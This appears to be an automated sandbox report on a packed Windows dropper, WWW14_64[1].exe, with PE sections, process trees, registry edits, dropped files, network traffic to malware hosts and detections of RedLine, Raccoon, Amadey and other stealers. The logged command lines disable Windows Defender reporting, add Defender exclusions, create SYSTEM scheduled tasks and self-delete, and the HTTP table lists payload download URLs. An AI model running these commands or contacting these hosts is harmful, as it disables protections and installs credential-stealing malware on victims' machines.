Pointer to Symbol Table:	0x00000000
Number of symbols:	0
Size of Optional Header:	0x00F0
Characteristics:	IMAGE_FILE_EXECUTABLE_IMAGE IMAGE_FILE_LARGE_ADDRESS_AWARE

Sections

Name	Virtual Address	Virtual Size	Raw Size	Charateristics	Entropy
.text	0x00001000	0x002FBCA5	0x00000000	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	0
.rdata	0x002FD000	0x0003B986	0x00000000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	0
.data	0x00339000	0x00012490	0x00000000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	0
.pdata	0x0034C000	0x00015000	0x00000000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	0
_RDATA	0x00361000	0x000000FC	0x00000000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	0
.vmp;""@si3	0x00362000	0x00336973	0x00000000	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	0
.vmp;""@	0x00699000	0x00000C00	0x00000C00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	2.73453
.vmp;""@t<[	0x0069A000	0x005B3C74	0x005B3E00	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_READ	7.90193
.reloc	0x00C4E000	0x000000D0	0x00000200	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	1.96799
.rsrc	0x00C4F000	0x0001DFCE	0x0001E000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	6.39859

Resources

Title	Entropy	Size	Codepage	Language	Type
1	5.27544	1838	UNKNOWN	English - United States	RT_MANIFEST
2	5.01515	67624	UNKNOWN	UNKNOWN	RT_ICON
3	7.97093	42579	UNKNOWN	UNKNOWN	RT_ICON

Imports


ADVAPI32.dll
KERNEL32.dll
SHELL32.dll
USER32.dll
ole32.dll

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

265

Monitored processes

141

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

244

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANOtuTxkpyUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

—

wscript.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Registry Console Tool

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\reg.exe
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernelbase.dll

272

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

—

Install.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

ForFiles - Executes a command on selected files

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\forfiles.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

276

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pHTdmwRwUHPFbNDphBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

—

wscript.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Registry Console Tool

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\kernelbase.dll

276

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AritgjejU\WtKcLm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "sOtopLRPzdWNzWf" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

—

iQegscw.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\schtasks.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

544

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OtiTFjOPYknRmwVY" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

—

cmd.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Registry Console Tool

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\msvcrt.dll

600

C:\Users\admin\AppData\Roaming\{846ee340-7039-11de-9d20-806e6f6e6963}\lSbth8S3.exe

—

Rec619.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\roaming\{846ee340-7039-11de-9d20-806e6f6e6963}\lsbth8s3.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

696

"C:\Windows\System32\cmd.exe" /c taskkill /im "Rec619.exe" /f & erase "C:\Program Files (x86)\FMOCover\Rec619\Rec619.exe" & exit

C:\Windows\SysWOW64\cmd.exe

—

Rec619.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

712

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\schtasks.exe

—

oneetx.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

764

CACLS "oneetx.exe" /P "admin:R" /E

C:\Windows\SysWOW64\cacls.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Control ACLs Program

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\cacls.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

868

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OtiTFjOPYknRmwVY\yShOhVMc\KnFdUxp.dll",#1 /yGsite_idtsz 525403

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows host process (Rundll32)

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

Add for printing

Total events

21 055

Read events

20 405

Write events

614

Delete events

Modification events


(PID) Process:	(1960) explorer.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:	write	Name:	CheckSetting
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB0100000040131FD0E0B45449B5325CF35709B45A0000000002000000000010660000000100002000000097BA847E5D0827CAFBC4D33F7B8AFE8834428DFEF065FA018D8CAB90C5710B0A000000000E8000000002000020000000703BDF28CF4D9DFCAB7DDC229F11B838657F02A563D675B7BA5A582848A73F4F300000008091631BBFD318C1A67DDE62193EF5F65F823DF6F3FB12C344A857963FC714699639A04F9F66927C69CA8E9AC61E02154000000007CED62AF9113E09870DE72EB5744E2CBFDC316C2CF8607885EA5CBB68D61BE0CFB49EE1C4CAF8F2769692B62252F8AB0F88C1F92875F93F72FE70BCC896EFE4
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}User
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies\Microsoft
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies\Microsoft\Windows Defender
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3020) WWW14_64[1].exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions
Operation:	delete key	Name:	(default)
Value:

Add for printing

Executable files

Suspicious files

Text files

102

Unknown types

Dropped files

PID	Process	Filename		Type
3020	WWW14_64[1].exe	C:\Users\admin\Pictures\Minor Policy\aKcLQTKe7Jo2dXeswsiTr0G9.exe		executable
		MD5:EE0516A44D6E7CC5E2BEF2CA0E5CF461	SHA256:8DC7D4261B9EA7463AE129A04C13BEB905D7A5722B03C90EA57E0A81C04F0880
3020	WWW14_64[1].exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\FUVFAZ8D.txt		text
		MD5:6F69B0B50D4AB4916DDA0C4572FA7383	SHA256:AB6F5BBE394BDD3588930931DF2780FB7E206FF6837BCFA4B73E8A8DDC74006F
3020	WWW14_64[1].exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\HCQ3XEP4.txt		text
		MD5:1918CBAAF0B5103AFE762F8ECECDFB84	SHA256:80AECA7611E814F90AC4CDCFF66E66F310D73205C537E21EFD0395034BA7B20A
3020	WWW14_64[1].exe	C:\Users\admin\Pictures\Minor Policy\tPUMHyr_GXgsJl0I6eUIRqNU.exe		text
		MD5:C965AA525AE4CFBC3B45C6B7E9271A59	SHA256:50EA6C698E72E13B8132B66BBCA9479B7F4815EBB2F8ADB3CA1CFEC79523107E
3020	WWW14_64[1].exe	C:\Users\admin\Pictures\Minor Policy\VbwzlPkCvFcIAjZzVHqES729.exe		html
		MD5:3188EEDC57A70165D557D4F870241849	SHA256:4A865B0F86DF77EE960E89F7F36067B452A2CF8DA46604F1ADC712860AFDC638
3020	WWW14_64[1].exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\2BRTNK78.txt		text
		MD5:82FE92B83D8E63EBB057F6AF95F4F7BD	SHA256:C5EED7799A1D436524E3C1A130B6134124E135CB8166F5679C98AF506AC1C246
3020	WWW14_64[1].exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\undoo[1].exe		executable
		MD5:EE0516A44D6E7CC5E2BEF2CA0E5CF461	SHA256:8DC7D4261B9EA7463AE129A04C13BEB905D7A5722B03C90EA57E0A81C04F0880
3020	WWW14_64[1].exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\J6NZK6W7.txt		text
		MD5:A7259ED5DD7FE2C805953BBF947D2539	SHA256:028609E6C3F362653E537B6AB3738D02DBA1272EADF9F94308A066824FCBCE6C
3020	WWW14_64[1].exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\setup_1[1].bmp		—
		MD5:—	SHA256:—
3020	WWW14_64[1].exe	C:\Users\admin\Pictures\Minor Policy\IZfNITzXXVGKJ4hJs21Ql_MK.exe		—
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

155

DNS requests

Threats

1 696

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3020	WWW14_64[1].exe	HEAD	—	45.9.74.80:80	http://45.9.74.80/undoo.exe	SC	—	—	malicious
3020	WWW14_64[1].exe	HEAD	404	94.156.35.76:80	http://230617061101912.und.anx63.shop/f/fsbm0617.exe	CY	—	—	suspicious
3020	WWW14_64[1].exe	HEAD	200	45.12.253.74:80	http://45.12.253.74/pineapple.php?pub=mixinte	BG	—	—	malicious
3020	WWW14_64[1].exe	GET	—	188.114.97.3:80	http://ji.jahhaega2qq.com/m/p0aw25.exe	US	—	—	malicious
2024	xYnUz2QC_ocIkOYsP8huHqbV.exe	GET	301	104.17.214.67:80	http://www.maxmind.com/geoip/v2.1/city/me	US	—	—	whitelisted
3020	WWW14_64[1].exe	POST	200	208.67.104.60:80	http://208.67.104.60/api/firegate.php	US	text	108 b	malicious
3020	WWW14_64[1].exe	GET	404	94.156.35.76:80	http://230617061101912.und.anx63.shop/f/fsbm0617.exe	CY	text	17 b	suspicious
3020	WWW14_64[1].exe	GET	301	141.95.126.89:80	http://red.mk/netTime.exe	FR	html	707 b	suspicious
3020	WWW14_64[1].exe	GET	200	45.12.253.74:80	http://45.12.253.74/pineapple.php?pub=mixinte	BG	executable	3.04 Mb	malicious
1252	Y2HOjH0snBs3RXz7lVECiUxD.exe	GET	200	39.109.117.57:80	http://as.imgjeoigaa.com/check/safe	HK	text	96 b	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3020	WWW14_64[1].exe	87.240.132.72:80	vk.com	VKontakte Ltd	RU	suspicious
3020	WWW14_64[1].exe	87.240.132.78:80	vk.com	VKontakte Ltd	RU	suspicious
4	System	192.168.100.255:137	—	—	—	whitelisted
328	svchost.exe	224.0.0.252:5355	—	—	—	unknown
3020	WWW14_64[1].exe	208.67.104.60:80	—	Delis LLC	US	malicious
3020	WWW14_64[1].exe	104.26.9.59:443	api.myip.com	CLOUDFLARENET	US	suspicious
3020	WWW14_64[1].exe	34.117.59.81:443	ipinfo.io	GOOGLE-CLOUD-PLATFORM	US	whitelisted
3020	WWW14_64[1].exe	87.240.137.164:80	vk.com	VKontakte Ltd	RU	suspicious
3020	WWW14_64[1].exe	93.186.225.194:443	vk.com	VKontakte Ltd	RU	suspicious
3020	WWW14_64[1].exe	93.186.225.194:80	vk.com	VKontakte Ltd	RU	suspicious

DNS requests

Domain	IP	Reputation
api.myip.com	104.26.9.59 172.67.75.163 104.26.8.59	suspicious
ipinfo.io	34.117.59.81	shared
vk.com	87.240.137.164 87.240.132.72 87.240.132.78 93.186.225.194 87.240.129.133 87.240.132.67	whitelisted
teredo.ipv6.microsoft.com	—	whitelisted
dns.msftncsi.com	131.107.255.255	shared
red.mk	141.95.126.89	suspicious
ji.jahhaega2qq.com	188.114.97.3 188.114.96.3	malicious
sergejbukotko.com	104.21.59.53 172.67.214.144	unknown
filetops.com	176.123.0.55	malicious
230617061101912.und.anx63.shop	94.156.35.76	suspicious

Threats

PID	Process	Class	Message
3020	WWW14_64[1].exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 39
3020	WWW14_64[1].exe	Device Retrieving External IP Address Detected	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)
3020	WWW14_64[1].exe	Malware Command and Control Activity Detected	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)
3020	WWW14_64[1].exe	Device Retrieving External IP Address Detected	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
3020	WWW14_64[1].exe	Generic Protocol Command Decode	SURICATA Applayer Mismatch protocol both directions
3020	WWW14_64[1].exe	Generic Protocol Command Decode	SURICATA Applayer Mismatch protocol both directions
3020	WWW14_64[1].exe	Generic Protocol Command Decode	SURICATA Applayer Mismatch protocol both directions
3020	WWW14_64[1].exe	Generic Protocol Command Decode	SURICATA Applayer Mismatch protocol both directions
3020	WWW14_64[1].exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
3020	WWW14_64[1].exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host

9 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

WWW14_64[1].exe

57494E075F2DB4E3B06F1772A106D1AA

A5B116F5801BD1ADAD5ADC4F8DA68AAAAE565C98

0A0C50DBC5D0C9811BFD0552DDD075E0E1DF2CF07049CC546E41F9BF08CB8290

98304:qoqwCSVZ/CBn6VqfRPsFfk/2LwgJzCpyUmdD3WV6O90dEC6KZ6YolvgFI48gQdz7:hqYVCBn6oJefe2LZzAm66jX/FAgW

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Creates a writable file the system directory

Actions looks like stealing of personal data

PRIVATELOADER was detected

Connects to the CnC server

Application was dropped or rewritten from another process

Steals credentials from Web Browsers

Loads dropped or rewritten executable

Changes the autorun value in the registry

Uses Task Scheduler to run other applications

FABOOKIE was detected

Application was injected by another process

Runs injected code in another process

AMADEY was detected

REDLINE was detected

Run PowerShell with an invisible window

PRIVATELOADER detected by memory dumps

GCLEANER was detected

RACCOON was detected

REDLINE detected by memory dumps

Steals credentials

Starts CMD.EXE for self-deleting

Modifies exclusions in Windows Defender

Uses Task Scheduler to autorun other applications

SMOKE was detected

Unusual connection from system programs

AMADEY detected by memory dumps

Modifies files in the Chrome extension folder

SUSPICIOUS

Reads settings of System Certificates

Connects to the server without a host name

Checks for external IP

Adds/modifies Windows certificates

Reads security settings of Internet Explorer

Checks Windows Trust Settings

Executes as Windows Service

Reads the Internet Settings

Executable content was dropped or overwritten

Process requests binary or script from the Internet

Reads the Windows owner or organization settings

Uses TASKKILL.EXE to kill Browsers

Starts itself from another location

Reads Microsoft Outlook installation path

Reads browser cookies

Starts CMD.EXE for commands execution

Reads the BIOS version

Application launched itself

Found strings related to reading or modifying Windows Defender settings

Uses ICACLS.EXE to modify access control lists

Uses REG/REGEDIT.EXE to modify registry

The process executes via Task Scheduler

Connects to unusual port

Searches for installed software

Process communicates with Telegram (possibly using it as an attacker's C2 server)_update

Uses TASKKILL.EXE to kill process

INFO

Checks supported languages

Reads the machine GUID from the registry

Reads the computer name

The process checks LSA protection

Process checks computer location settings

Checks proxy server information

Creates files or folders in the user directory

Create files in a temporary directory

Application was dropped or rewritten from another process

Creates files in the program directory

Reads Environment values

Reads product name

Reads CPU info

Malware configuration